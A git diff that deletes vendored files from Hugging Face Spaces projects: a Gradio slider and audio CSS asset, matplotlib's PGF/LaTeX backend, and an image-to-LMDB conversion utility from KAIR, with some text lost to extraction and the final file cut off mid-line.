b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-de9ed39e.css deleted file mode 100644 index 463d37a8a75c97e2c4ecd3aaf5081dd8a2f90164..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-de9ed39e.css +++ /dev/null @@ -1 +0,0 @@ -.rangeSlider{--pip:var(--range-pip, lightslategray);--pip-text:var(--range-pip-text, var(--pip));--pip-active:var(--range-pip-active, darkslategrey);--pip-active-text:var(--range-pip-active-text, var(--pip-active));--pip-hover:var(--range-pip-hover, darkslategrey);--pip-hover-text:var(--range-pip-hover-text, var(--pip-hover));--pip-in-range:var(--range-pip-in-range, var(--pip-active));--pip-in-range-text:var(--range-pip-in-range-text, var(--pip-active-text))}.rangePips{position:absolute;height:1em;left:0;right:0;bottom:-1em}.rangePips.vertical{height:auto;width:1em;inset:0 auto 0 100%}.rangePips .pip{height:.4em;position:absolute;top:.25em;width:1px;white-space:nowrap}.rangePips.vertical .pip{height:1px;width:.4em;left:.25em;top:auto;bottom:auto}.rangePips .pipVal{position:absolute;top:.4em;transform:translate(-50%,25%)}.rangePips.vertical .pipVal{position:absolute;top:0;left:.4em;transform:translate(25%,-50%)}.rangePips .pip{transition:all .15s ease}.rangePips .pipVal{transition:all .15s ease,font-weight 0s linear}.rangePips .pip{color:#789;color:var(--pip-text);background-color:#789;background-color:var(--pip)}.rangePips .pip.selected{color:#2f4f4f;color:var(--pip-active-text);background-color:#2f4f4f;background-color:var(--pip-active)}.rangePips.hoverable:not(.disabled) .pip:hover{color:#2f4f4f;color:var(--pip-hover-text);background-color:#2f4f4f;background-color:var(--pip-hover)}.rangePips .pip.in-range{color:#2f4f4f;color:var(--pip-in-range-text);background-color:#2f4f4f;background-color:var(--pip-in-range)}.rangePips .pip.selected{height:.75em}.rangePips.vertical .pip.selected{height:1px;width:.75em}.rangePips .pip.selected .pipVal{font-weight:700;top:.75em}.rangePips.vertical .pip.selected .pipVal{top:0;left:.75em}.rangePips.hoverable:not(.disabled) .pip:not(.selected):hover{transition:none}.rangePips.hoverable:not(.disabled) .pip:not(.selected):hover .pipVal{transition:none;font-weight:700}.rangeSlider{--slider:var(--range-slider, #d7dada);--handle-inactive:var(--range-handle-inactive, #99a2a2);--handle:var(--range-handle, #838de7);--handle-focus:var(--range-handle-focus, #4a40d4);--handle-border:var(--range-handle-border, var(--handle));--range-inactive:var(--range-range-inactive, var(--handle-inactive));--range:var(--range-range, var(--handle-focus));--float-inactive:var(--range-float-inactive, var(--handle-inactive));--float:var(--range-float, var(--handle-focus));--float-text:var(--range-float-text, white)}.rangeSlider{position:relative;border-radius:100px;height:.5em;margin:1em;transition:opacity .2s ease;user-select:none}.rangeSlider *{user-select:none}.rangeSlider.pips{margin-bottom:1.8em}.rangeSlider.pip-labels{margin-bottom:2.8em}.rangeSlider.vertical{display:inline-block;border-radius:100px;width:.5em;min-height:200px}.rangeSlider.vertical.pips{margin-right:1.8em;margin-bottom:1em}.rangeSlider.vertical.pip-labels{margin-right:2.8em;margin-bottom:1em}.rangeSlider .rangeHandle{position:absolute;display:block;height:1.4em;width:1.4em;top:.25em;bottom:auto;transform:translateY(-50%) translate(-50%);z-index:2}.rangeSlider.reversed .rangeHandle{transform:translateY(-50%) translate(50%)}.rangeSlider.vertical .rangeHandle{left:.25em;top:auto;transform:translateY(50%) translate(-50%)}.rangeSlider.vertical.reversed .rangeHandle{transform:translateY(-50%) translate(-50%)}.rangeSlider .rangeNub,.rangeSlider .rangeHandle:before{position:absolute;left:0;top:0;display:block;border-radius:10em;height:100%;width:100%;transition:box-shadow .2s ease}.rangeSlider .rangeHandle:before{content:"";inset:1px;height:auto;width:auto;box-shadow:0 0 0 0 var(--handle-border);opacity:0}.rangeSlider.hoverable:not(.disabled) .rangeHandle:hover:before{box-shadow:0 0 0 8px var(--handle-border);opacity:.2}.rangeSlider.hoverable:not(.disabled) .rangeHandle.press:before,.rangeSlider.hoverable:not(.disabled) .rangeHandle.press:hover:before{box-shadow:0 0 0 12px var(--handle-border);opacity:.4}.rangeSlider.range:not(.min):not(.max) .rangeNub{border-radius:10em 10em 10em 1.6em}.rangeSlider.range .rangeHandle:nth-of-type(1) .rangeNub{transform:rotate(-135deg)}.rangeSlider.range .rangeHandle:nth-of-type(2) .rangeNub{transform:rotate(45deg)}.rangeSlider.range.reversed .rangeHandle:nth-of-type(1) .rangeNub{transform:rotate(45deg)}.rangeSlider.range.reversed .rangeHandle:nth-of-type(2) .rangeNub{transform:rotate(-135deg)}.rangeSlider.range.vertical .rangeHandle:nth-of-type(1) .rangeNub{transform:rotate(135deg)}.rangeSlider.range.vertical .rangeHandle:nth-of-type(2) .rangeNub{transform:rotate(-45deg)}.rangeSlider.range.vertical.reversed .rangeHandle:nth-of-type(1) .rangeNub{transform:rotate(-45deg)}.rangeSlider.range.vertical.reversed .rangeHandle:nth-of-type(2) .rangeNub{transform:rotate(135deg)}.rangeSlider .rangeFloat{display:block;position:absolute;left:50%;top:-.5em;transform:translate(-50%,-100%);font-size:1em;text-align:center;opacity:0;pointer-events:none;white-space:nowrap;transition:all .2s ease;font-size:.9em;padding:.2em .4em;border-radius:.2em}.rangeSlider .rangeHandle.active .rangeFloat,.rangeSlider.hoverable .rangeHandle:hover .rangeFloat{opacity:1;top:-.2em;transform:translate(-50%,-100%)}.rangeSlider .rangeBar{position:absolute;display:block;transition:background .2s ease;border-radius:1em;height:.5em;top:0;user-select:none;z-index:1}.rangeSlider.vertical .rangeBar{width:.5em;height:auto}.rangeSlider{background-color:#d7dada;background-color:var(--slider)}.rangeSlider .rangeBar{background-color:#99a2a2;background-color:var(--range-inactive)}.rangeSlider.focus .rangeBar{background-color:#838de7;background-color:var(--range)}.rangeSlider .rangeNub{background-color:#99a2a2;background-color:var(--handle-inactive)}.rangeSlider.focus .rangeNub{background-color:#838de7;background-color:var(--handle)}.rangeSlider .rangeHandle.active .rangeNub{background-color:#4a40d4;background-color:var(--handle-focus)}.rangeSlider .rangeFloat{color:#fff;color:var(--float-text);background-color:#99a2a2;background-color:var(--float-inactive)}.rangeSlider.focus .rangeFloat{background-color:#4a40d4;background-color:var(--float)}.rangeSlider.disabled{opacity:.5}.rangeSlider.disabled .rangeNub{background-color:#d7dada;background-color:var(--slider)}.mic-wrap.svelte-1thnwz{padding:var(--size-2)}.record-icon.svelte-1thnwz{display:flex;position:relative;margin-right:var(--size-2);width:6px;height:6px}.dot.svelte-1thnwz{display:inline-flex;position:relative;border-radius:var(--radius-full);background:var(--color-red-500);width:6px;height:6px}.pinger.svelte-1thnwz{display:inline-flex;position:absolute;opacity:.9;animation:svelte-1thnwz-ping 1s cubic-bezier(0,0,.2,1) infinite;border-radius:var(--radius-full);background:var(--color-red-500);width:var(--size-full);height:var(--size-full)}@keyframes svelte-1thnwz-ping{75%,to{transform:scale(2);opacity:0}}audio.svelte-1thnwz{padding:var(--size-2);width:var(--size-full);height:var(--size-14)}audio.svelte-eemfgq{padding:var(--size-2);width:var(--size-full);height:var(--size-14)} diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/matplotlib/backends/backend_pgf.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/matplotlib/backends/backend_pgf.py deleted file mode 100644 index 7312f300a57bd1ac12f4a61afd1c96e726d04c60..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/matplotlib/backends/backend_pgf.py +++ /dev/null @@ -1,1056 +0,0 @@ -import codecs -import datetime -import functools -from io import BytesIO -import logging -import math -import os -import pathlib -import re -import shutil -import subprocess -from tempfile import TemporaryDirectory -import weakref - -from PIL import Image - -import matplotlib as mpl -from matplotlib import _api, cbook, font_manager as fm -from matplotlib.backend_bases import ( - _Backend, FigureCanvasBase, FigureManagerBase, RendererBase -) -from matplotlib.backends.backend_mixed import MixedModeRenderer -from matplotlib.backends.backend_pdf import ( - _create_pdf_info_dict, _datetime_to_pdf) -from matplotlib.path import Path -from matplotlib.figure import Figure -from matplotlib._pylab_helpers import Gcf - -_log = logging.getLogger(__name__) - - -# Note: When formatting floating point values, it is important to use the -# %f/{:f} format rather than %s/{} to avoid triggering scientific notation, -# which is not recognized by TeX. - - -@_api.caching_module_getattr -class __getattr__: - NO_ESCAPE = _api.deprecated("3.6", obj_type="")( - property(lambda self: _NO_ESCAPE)) - re_mathsep = _api.deprecated("3.6", obj_type="")( - property(lambda self: _split_math.__self__)) - - -@_api.deprecated("3.6") -def get_fontspec(): - """Build fontspec preamble from rc.""" - with mpl.rc_context({"pgf.preamble": ""}): - return _get_preamble() - - -@_api.deprecated("3.6") -def get_preamble(): - """Get LaTeX preamble from rc.""" - return mpl.rcParams["pgf.preamble"] - - -def _get_preamble(): - """Prepare a LaTeX preamble based on the rcParams configuration.""" - preamble = [mpl.rcParams["pgf.preamble"]] - if mpl.rcParams["pgf.texsystem"] != "pdflatex": - preamble.append("\\usepackage{fontspec}") - if mpl.rcParams["pgf.rcfonts"]: - families = ["serif", "sans\\-serif", "monospace"] - commands = ["setmainfont", "setsansfont", "setmonofont"] - for family, command in zip(families, commands): - # 1) Forward slashes also work on Windows, so don't mess with - # backslashes. 2) The dirname needs to include a separator. - path = pathlib.Path(fm.findfont(family)) - preamble.append(r"\%s{%s}[Path=\detokenize{%s/}]" % ( - command, path.name, path.parent.as_posix())) - preamble.append(mpl.texmanager._usepackage_if_not_loaded( - "underscore", option="strings")) # Documented as "must come last". - return "\n".join(preamble) - - -# It's better to use only one unit for all coordinates, since the -# arithmetic in latex seems to produce inaccurate conversions. -latex_pt_to_in = 1. / 72.27 -latex_in_to_pt = 1. / latex_pt_to_in -mpl_pt_to_in = 1. / 72. -mpl_in_to_pt = 1. / mpl_pt_to_in - - -_NO_ESCAPE = r"(? 3 else 1.0 - - if has_fill: - _writeln(self.fh, - r"\definecolor{currentfill}{rgb}{%f,%f,%f}" - % tuple(rgbFace[:3])) - _writeln(self.fh, r"\pgfsetfillcolor{currentfill}") - if has_fill and fillopacity != 1.0: - _writeln(self.fh, r"\pgfsetfillopacity{%f}" % fillopacity) - - # linewidth and color - lw = gc.get_linewidth() * mpl_pt_to_in * latex_in_to_pt - stroke_rgba = gc.get_rgb() - _writeln(self.fh, r"\pgfsetlinewidth{%fpt}" % lw) - _writeln(self.fh, - r"\definecolor{currentstroke}{rgb}{%f,%f,%f}" - % stroke_rgba[:3]) - _writeln(self.fh, r"\pgfsetstrokecolor{currentstroke}") - if strokeopacity != 1.0: - _writeln(self.fh, r"\pgfsetstrokeopacity{%f}" % strokeopacity) - - # line style - dash_offset, dash_list = gc.get_dashes() - if dash_list is None: - _writeln(self.fh, r"\pgfsetdash{}{0pt}") - else: - _writeln(self.fh, - r"\pgfsetdash{%s}{%fpt}" - % ("".join(r"{%fpt}" % dash for dash in dash_list), - dash_offset)) - - def _print_pgf_path(self, gc, path, transform, rgbFace=None): - f = 1. / self.dpi - # check for clip box / ignore clip for filled paths - bbox = gc.get_clip_rectangle() if gc else None - maxcoord = 16383 / 72.27 * self.dpi # Max dimensions in LaTeX. - if bbox and (rgbFace is None): - p1, p2 = bbox.get_points() - clip = (max(p1[0], -maxcoord), max(p1[1], -maxcoord), - min(p2[0], maxcoord), min(p2[1], maxcoord)) - else: - clip = (-maxcoord, -maxcoord, maxcoord, maxcoord) - # build path - for points, code in path.iter_segments(transform, clip=clip): - if code == Path.MOVETO: - x, y = tuple(points) - _writeln(self.fh, - r"\pgfpathmoveto{\pgfqpoint{%fin}{%fin}}" % - (f * x, f * y)) - elif code == Path.CLOSEPOLY: - _writeln(self.fh, r"\pgfpathclose") - elif code == Path.LINETO: - x, y = tuple(points) - _writeln(self.fh, - r"\pgfpathlineto{\pgfqpoint{%fin}{%fin}}" % - (f * x, f * y)) - elif code == Path.CURVE3: - cx, cy, px, py = tuple(points) - coords = cx * f, cy * f, px * f, py * f - _writeln(self.fh, - r"\pgfpathquadraticcurveto" - r"{\pgfqpoint{%fin}{%fin}}{\pgfqpoint{%fin}{%fin}}" - % coords) - elif code == Path.CURVE4: - c1x, c1y, c2x, c2y, px, py = tuple(points) - coords = c1x * f, c1y * f, c2x * f, c2y * f, px * f, py * f - _writeln(self.fh, - r"\pgfpathcurveto" - r"{\pgfqpoint{%fin}{%fin}}" - r"{\pgfqpoint{%fin}{%fin}}" - r"{\pgfqpoint{%fin}{%fin}}" - % coords) - - # apply pgf decorators - sketch_params = gc.get_sketch_params() if gc else None - if sketch_params is not None: - # Only "length" directly maps to "segment length" in PGF's API. - # PGF uses "amplitude" to pass the combined deviation in both x- - # and y-direction, while matplotlib only varies the length of the - # wiggle along the line ("randomness" and "length" parameters) - # and has a separate "scale" argument for the amplitude. - # -> Use "randomness" as PRNG seed to allow the user to force the - # same shape on multiple sketched lines - scale, length, randomness = sketch_params - if scale is not None: - # make matplotlib and PGF rendering visually similar - length *= 0.5 - scale *= 2 - # PGF guarantees that repeated loading is a no-op - _writeln(self.fh, r"\usepgfmodule{decorations}") - _writeln(self.fh, r"\usepgflibrary{decorations.pathmorphing}") - _writeln(self.fh, r"\pgfkeys{/pgf/decoration/.cd, " - f"segment length = {(length * f):f}in, " - f"amplitude = {(scale * f):f}in}}") - _writeln(self.fh, f"\\pgfmathsetseed{{{int(randomness)}}}") - _writeln(self.fh, r"\pgfdecoratecurrentpath{random steps}") - - def _pgf_path_draw(self, stroke=True, fill=False): - actions = [] - if stroke: - actions.append("stroke") - if fill: - actions.append("fill") - _writeln(self.fh, r"\pgfusepath{%s}" % ",".join(actions)) - - def option_scale_image(self): - # docstring inherited - return True - - def option_image_nocomposite(self): - # docstring inherited - return not mpl.rcParams['image.composite_image'] - - def draw_image(self, gc, x, y, im, transform=None): - # docstring inherited - - h, w = im.shape[:2] - if w == 0 or h == 0: - return - - if not os.path.exists(getattr(self.fh, "name", "")): - raise ValueError( - "streamed pgf-code does not support raster graphics, consider " - "using the pgf-to-pdf option") - - # save the images to png files - path = pathlib.Path(self.fh.name) - fname_img = "%s-img%d.png" % (path.stem, self.image_counter) - Image.fromarray(im[::-1]).save(path.parent / fname_img) - self.image_counter += 1 - - # reference the image in the pgf picture - _writeln(self.fh, r"\begin{pgfscope}") - self._print_pgf_clip(gc) - f = 1. / self.dpi # from display coords to inch - if transform is None: - _writeln(self.fh, - r"\pgfsys@transformshift{%fin}{%fin}" % (x * f, y * f)) - w, h = w * f, h * f - else: - tr1, tr2, tr3, tr4, tr5, tr6 = transform.frozen().to_values() - _writeln(self.fh, - r"\pgfsys@transformcm{%f}{%f}{%f}{%f}{%fin}{%fin}" % - (tr1 * f, tr2 * f, tr3 * f, tr4 * f, - (tr5 + x) * f, (tr6 + y) * f)) - w = h = 1 # scale is already included in the transform - interp = str(transform is None).lower() # interpolation in PDF reader - _writeln(self.fh, - r"\pgftext[left,bottom]" - r"{%s[interpolate=%s,width=%fin,height=%fin]{%s}}" % - (_get_image_inclusion_command(), - interp, w, h, fname_img)) - _writeln(self.fh, r"\end{pgfscope}") - - def draw_tex(self, gc, x, y, s, prop, angle, *, mtext=None): - # docstring inherited - self.draw_text(gc, x, y, s, prop, angle, ismath="TeX", mtext=mtext) - - def draw_text(self, gc, x, y, s, prop, angle, ismath=False, mtext=None): - # docstring inherited - - # prepare string for tex - s = _escape_and_apply_props(s, prop) - - _writeln(self.fh, r"\begin{pgfscope}") - - alpha = gc.get_alpha() - if alpha != 1.0: - _writeln(self.fh, r"\pgfsetfillopacity{%f}" % alpha) - _writeln(self.fh, r"\pgfsetstrokeopacity{%f}" % alpha) - rgb = tuple(gc.get_rgb())[:3] - _writeln(self.fh, r"\definecolor{textcolor}{rgb}{%f,%f,%f}" % rgb) - _writeln(self.fh, r"\pgfsetstrokecolor{textcolor}") - _writeln(self.fh, r"\pgfsetfillcolor{textcolor}") - s = r"\color{textcolor}" + s - - dpi = self.figure.dpi - text_args = [] - if mtext and ( - (angle == 0 or - mtext.get_rotation_mode() == "anchor") and - mtext.get_verticalalignment() != "center_baseline"): - # if text anchoring can be supported, get the original coordinates - # and add alignment information - pos = mtext.get_unitless_position() - x, y = mtext.get_transform().transform(pos) - halign = {"left": "left", "right": "right", "center": ""} - valign = {"top": "top", "bottom": "bottom", - "baseline": "base", "center": ""} - text_args.extend([ - f"x={x/dpi:f}in", - f"y={y/dpi:f}in", - halign[mtext.get_horizontalalignment()], - valign[mtext.get_verticalalignment()], - ]) - else: - # if not, use the text layout provided by Matplotlib. - text_args.append(f"x={x/dpi:f}in, y={y/dpi:f}in, left, base") - - if angle != 0: - text_args.append("rotate=%f" % angle) - - _writeln(self.fh, r"\pgftext[%s]{%s}" % (",".join(text_args), s)) - _writeln(self.fh, r"\end{pgfscope}") - - def get_text_width_height_descent(self, s, prop, ismath): - # docstring inherited - # get text metrics in units of latex pt, convert to display units - w, h, d = (LatexManager._get_cached_or_new() - .get_width_height_descent(s, prop)) - # TODO: this should be latex_pt_to_in instead of mpl_pt_to_in - # but having a little bit more space around the text looks better, - # plus the bounding box reported by LaTeX is VERY narrow - f = mpl_pt_to_in * self.dpi - return w * f, h * f, d * f - - def flipy(self): - # docstring inherited - return False - - def get_canvas_width_height(self): - # docstring inherited - return (self.figure.get_figwidth() * self.dpi, - self.figure.get_figheight() * self.dpi) - - def points_to_pixels(self, points): - # docstring inherited - return points * mpl_pt_to_in * self.dpi - - -class FigureCanvasPgf(FigureCanvasBase): - filetypes = {"pgf": "LaTeX PGF picture", - "pdf": "LaTeX compiled PGF picture", - "png": "Portable Network Graphics", } - - def get_default_filetype(self): - return 'pdf' - - def _print_pgf_to_fh(self, fh, *, bbox_inches_restore=None): - - header_text = """%% Creator: Matplotlib, PGF backend -%% -%% To include the figure in your LaTeX document, write -%% \\input{.pgf} -%% -%% Make sure the required packages are loaded in your preamble -%% \\usepackage{pgf} -%% -%% Also ensure that all the required font packages are loaded; for instance, -%% the lmodern package is sometimes necessary when using math font. -%% \\usepackage{lmodern} -%% -%% Figures using additional raster images can only be included by \\input if -%% they are in the same directory as the main LaTeX file. For loading figures -%% from other directories you can use the `import` package -%% \\usepackage{import} -%% -%% and then include the figures with -%% \\import{}{.pgf} -%% -""" - - # append the preamble used by the backend as a comment for debugging - header_info_preamble = ["%% Matplotlib used the following preamble"] - for line in _get_preamble().splitlines(): - header_info_preamble.append("%% " + line) - header_info_preamble.append("%%") - header_info_preamble = "\n".join(header_info_preamble) - - # get figure size in inch - w, h = self.figure.get_figwidth(), self.figure.get_figheight() - dpi = self.figure.dpi - - # create pgfpicture environment and write the pgf code - fh.write(header_text) - fh.write(header_info_preamble) - fh.write("\n") - _writeln(fh, r"\begingroup") - _writeln(fh, r"\makeatletter") - _writeln(fh, r"\begin{pgfpicture}") - _writeln(fh, - r"\pgfpathrectangle{\pgfpointorigin}{\pgfqpoint{%fin}{%fin}}" - % (w, h)) - _writeln(fh, r"\pgfusepath{use as bounding box, clip}") - renderer = MixedModeRenderer(self.figure, w, h, dpi, - RendererPgf(self.figure, fh), - bbox_inches_restore=bbox_inches_restore) - self.figure.draw(renderer) - - # end the pgfpicture environment - _writeln(fh, r"\end{pgfpicture}") - _writeln(fh, r"\makeatother") - _writeln(fh, r"\endgroup") - - def print_pgf(self, fname_or_fh, **kwargs): - """ - Output pgf macros for drawing the figure so it can be included and - rendered in latex documents. - """ - with cbook.open_file_cm(fname_or_fh, "w", encoding="utf-8") as file: - if not cbook.file_requires_unicode(file): - file = codecs.getwriter("utf-8")(file) - self._print_pgf_to_fh(file, **kwargs) - - def print_pdf(self, fname_or_fh, *, metadata=None, **kwargs): - """Use LaTeX to compile a pgf generated figure to pdf.""" - w, h = self.figure.get_size_inches() - - info_dict = _create_pdf_info_dict('pgf', metadata or {}) - pdfinfo = ','.join( - _metadata_to_str(k, v) for k, v in info_dict.items()) - - # print figure to pgf and compile it with latex - with TemporaryDirectory() as tmpdir: - tmppath = pathlib.Path(tmpdir) - self.print_pgf(tmppath / "figure.pgf", **kwargs) - (tmppath / "figure.tex").write_text( - "\n".join([ - r"\documentclass[12pt]{article}", - r"\usepackage[pdfinfo={%s}]{hyperref}" % pdfinfo, - r"\usepackage[papersize={%fin,%fin}, margin=0in]{geometry}" - % (w, h), - r"\usepackage{pgf}", - _get_preamble(), - r"\begin{document}", - r"\centering", - r"\input{figure.pgf}", - r"\end{document}", - ]), encoding="utf-8") - texcommand = mpl.rcParams["pgf.texsystem"] - cbook._check_and_log_subprocess( - [texcommand, "-interaction=nonstopmode", "-halt-on-error", - "figure.tex"], _log, cwd=tmpdir) - with (tmppath / "figure.pdf").open("rb") as orig, \ - cbook.open_file_cm(fname_or_fh, "wb") as dest: - shutil.copyfileobj(orig, dest) # copy file contents to target - - def print_png(self, fname_or_fh, **kwargs): - """Use LaTeX to compile a pgf figure to pdf and convert it to png.""" - converter = make_pdf_to_png_converter() - with TemporaryDirectory() as tmpdir: - tmppath = pathlib.Path(tmpdir) - pdf_path = tmppath / "figure.pdf" - png_path = tmppath / "figure.png" - self.print_pdf(pdf_path, **kwargs) - converter(pdf_path, png_path, dpi=self.figure.dpi) - with png_path.open("rb") as orig, \ - cbook.open_file_cm(fname_or_fh, "wb") as dest: - shutil.copyfileobj(orig, dest) # copy file contents to target - - def get_renderer(self): - return RendererPgf(self.figure, None) - - def draw(self): - self.figure.draw_without_rendering() - return super().draw() - - -FigureManagerPgf = FigureManagerBase - - -@_Backend.export -class _BackendPgf(_Backend): - FigureCanvas = FigureCanvasPgf - - -class PdfPages: - """ - A multi-page PDF file using the pgf backend - - Examples - -------- - >>> import matplotlib.pyplot as plt - >>> # Initialize: - >>> with PdfPages('foo.pdf') as pdf: - ... # As many times as you like, create a figure fig and save it: - ... fig = plt.figure() - ... pdf.savefig(fig) - ... # When no figure is specified the current figure is saved - ... pdf.savefig() - """ - __slots__ = ( - '_output_name', - 'keep_empty', - '_n_figures', - '_file', - '_info_dict', - '_metadata', - ) - - def __init__(self, filename, *, keep_empty=True, metadata=None): - """ - Create a new PdfPages object. - - Parameters - ---------- - filename : str or path-like - Plots using `PdfPages.savefig` will be written to a file at this - location. Any older file with the same name is overwritten. - - keep_empty : bool, default: True - If set to False, then empty pdf files will be deleted automatically - when closed. - - metadata : dict, optional - Information dictionary object (see PDF reference section 10.2.1 - 'Document Information Dictionary'), e.g.: - ``{'Creator': 'My software', 'Author': 'Me', 'Title': 'Awesome'}``. - - The standard keys are 'Title', 'Author', 'Subject', 'Keywords', - 'Creator', 'Producer', 'CreationDate', 'ModDate', and - 'Trapped'. Values have been predefined for 'Creator', 'Producer' - and 'CreationDate'. They can be removed by setting them to `None`. - - Note that some versions of LaTeX engines may ignore the 'Producer' - key and set it to themselves. - """ - self._output_name = filename - self._n_figures = 0 - self.keep_empty = keep_empty - self._metadata = (metadata or {}).copy() - self._info_dict = _create_pdf_info_dict('pgf', self._metadata) - self._file = BytesIO() - - def _write_header(self, width_inches, height_inches): - pdfinfo = ','.join( - _metadata_to_str(k, v) for k, v in self._info_dict.items()) - latex_header = "\n".join([ - r"\documentclass[12pt]{article}", - r"\usepackage[pdfinfo={%s}]{hyperref}" % pdfinfo, - r"\usepackage[papersize={%fin,%fin}, margin=0in]{geometry}" - % (width_inches, height_inches), - r"\usepackage{pgf}", - _get_preamble(), - r"\setlength{\parindent}{0pt}", - r"\begin{document}%", - ]) - self._file.write(latex_header.encode('utf-8')) - - def __enter__(self): - return self - - def __exit__(self, exc_type, exc_val, exc_tb): - self.close() - - def close(self): - """ - Finalize this object, running LaTeX in a temporary directory - and moving the final pdf file to *filename*. - """ - self._file.write(rb'\end{document}\n') - if self._n_figures > 0: - self._run_latex() - elif self.keep_empty: - open(self._output_name, 'wb').close() - self._file.close() - - def _run_latex(self): - texcommand = mpl.rcParams["pgf.texsystem"] - with TemporaryDirectory() as tmpdir: - tex_source = pathlib.Path(tmpdir, "pdf_pages.tex") - tex_source.write_bytes(self._file.getvalue()) - cbook._check_and_log_subprocess( - [texcommand, "-interaction=nonstopmode", "-halt-on-error", - tex_source], - _log, cwd=tmpdir) - shutil.move(tex_source.with_suffix(".pdf"), self._output_name) - - def savefig(self, figure=None, **kwargs): - """ - Save a `.Figure` to this file as a new page. - - Any other keyword arguments are passed to `~.Figure.savefig`. - - Parameters - ---------- - figure : `.Figure` or int, default: the active figure - The figure, or index of the figure, that is saved to the file. - """ - if not isinstance(figure, Figure): - if figure is None: - manager = Gcf.get_active() - else: - manager = Gcf.get_fig_manager(figure) - if manager is None: - raise ValueError("No figure {}".format(figure)) - figure = manager.canvas.figure - - try: - orig_canvas = figure.canvas - figure.canvas = FigureCanvasPgf(figure) - - width, height = figure.get_size_inches() - if self._n_figures == 0: - self._write_header(width, height) - else: - # \pdfpagewidth and \pdfpageheight exist on pdftex, xetex, and - # luatex<0.85; they were renamed to \pagewidth and \pageheight - # on luatex>=0.85. - self._file.write( - br'\newpage' - br'\ifdefined\pdfpagewidth\pdfpagewidth' - br'\else\pagewidth\fi=%ain' - br'\ifdefined\pdfpageheight\pdfpageheight' - br'\else\pageheight\fi=%ain' - b'%%\n' % (width, height) - ) - - figure.savefig(self._file, format="pgf", **kwargs) - self._n_figures += 1 - finally: - figure.canvas = orig_canvas - - def get_pagecount(self): - """Return the current number of pages in the multipage pdf file.""" - return self._n_figures diff --git a/spaces/lambdalabs/LambdaSuperRes/KAIR/utils/utils_lmdb.py b/spaces/lambdalabs/LambdaSuperRes/KAIR/utils/utils_lmdb.py deleted file mode 100644 index 75192c346bb9c0b96f8b09635ed548bd6e797d89..0000000000000000000000000000000000000000 --- a/spaces/lambdalabs/LambdaSuperRes/KAIR/utils/utils_lmdb.py +++ /dev/null @@ -1,205 +0,0 @@ -import cv2 -import lmdb -import sys -from multiprocessing import Pool -from os import path as osp -from tqdm import tqdm - - -def make_lmdb_from_imgs(data_path, - lmdb_path, - img_path_list, - keys, - batch=5000, - compress_level=1, - multiprocessing_read=False, - n_thread=40, - map_size=None): - """Make lmdb from images. - - Contents of lmdb. The file structure is: - example.lmdb - ├── data.mdb - ├── lock.mdb - ├── meta_info.txt - - The data.mdb and lock.mdb are standard lmdb files and you can refer to - https://lmdb.readthedocs.io/en/release/ for more details. - - The meta_info.txt is a specified txt file to record the meta information - of our datasets. It will be automatically created when preparing - datasets by our provided dataset tools. - Each line in the txt file records 1)image name (with extension), - 2)image shape, and 3)compression level, separated by a white space. - - For example, the meta information could be: - `000_00000000.png (720,1280,3) 1`, which means: - 1) image name (with extension): 000_00000000.png; - 2) image shape: (720,1280,3); - 3) compression level: 1 - - We use the image name without extension as the lmdb key. - - If `multiprocessing_read` is True, it will read all the images to memory - using multiprocessing. Thus, your server needs to have enough memory. - - Args: - data_path (str): Data path for reading images. - lmdb_path (str): Lmdb save path. - img_path_list (str): Image path list. - keys (str): Used for lmdb keys. - batch (int): After processing batch images, lmdb commits. - Default: 5000. - compress_level (int): Compress level when encoding images. Default: 1. - multiprocessing_read (bool): Whether use multiprocessing to read all - the images to memory. Default: False. - n_thread (int): For multiprocessing. - map_size (int | None): Map size for lmdb env. If None, use the - estimated size from images. Default: None - """ - - assert len(img_path_list) == len(keys), ('img_path_list and keys should have the same length, ' - f'but got {len(img_path_list)} and {len(keys)}') - print(f'Create lmdb for {data_path}, save to {lmdb_path}...') - print(f'Totoal images: {len(img_path_list)}') - if not lmdb_path.endswith('.lmdb'): - raise ValueError("lmdb_path must end with '.lmdb'.") - if osp.exists(lmdb_path): - print(f'Folder {lmdb_path} already exists. Exit.') - sys.exit(1) - - if multiprocessing_read: - # read all the images to memory (multiprocessing) - dataset = {} # use dict to keep the order for multiprocessing - shapes = {} - print(f'Read images with multiprocessing, #thread: {n_thread} ...') - pbar = tqdm(total=len(img_path_list), unit='image') - - def callback(arg): - """get the image data and update pbar.""" - key, dataset[key], shapes[key] = arg - pbar.update(1) - pbar.set_description(f'Read {key}') - - pool = Pool(n_thread) - for path, key in zip(img_path_list, keys): - pool.apply_async(read_img_worker, args=(osp.join(data_path, path), key, compress_level), callback=callback) - pool.close() - pool.join() - pbar.close() - print(f'Finish reading {len(img_path_list)} images.') - - # create lmdb environment - if map_size is None: - # obtain data size for one image - img = cv2.imread(osp.join(data_path, img_path_list[0]), cv2.IMREAD_UNCHANGED) - _, img_byte = cv2.imencode('.png', img, [cv2.IMWRITE_PNG_COMPRESSION, compress_level]) - data_size_per_img = img_byte.nbytes - print('Data size per image is: ', data_size_per_img) - data_size = data_size_per_img * len(img_path_list) - map_size = data_size * 10 - - env = lmdb.open(lmdb_path, map_size=map_size) - - # write data to lmdb - pbar = tqdm(total=len(img_path_list), unit='chunk') - txn = env.begin(write=True) - txt_file = open(osp.join(lmdb_path, 'meta_info.txt'), 'w') - for idx, (path, key) in enumerate(zip(img_path_list, keys)): - pbar.update(1) - pbar.set_description(f'Write {key}') - key_byte = key.encode('ascii') - if multiprocessing_read: - img_byte = dataset[key] - h, w, c = shapes[key] - else: - _, img_byte, img_shape = read_img_worker(osp.join(data_path, path), key, compress_level) - h, w, c = img_shape - - txn.put(key_byte, img_byte) - # write meta information - txt_file.write(f'{key}.png ({h},{w},{c}) {compress_level}\n') - if idx % batch == 0: - txn.commit() - txn = env.begin(write=True) - pbar.close() - txn.commit() - env.close() - txt_file.close() - print('\nFinish writing lmdb.') - - -def read_img_worker(path, key, compress_level): - """Read image worker. - - Args: - path (str): Image path. - key (str): Image key. - compress_level (int): Compress level when encoding images. - - Returns: - str: Image key. - byte: Image byte. - tuple[int]: Image shape. - """ - - img = cv2.imread(path, cv2.IMREAD_UNCHANGED) - # deal with `libpng 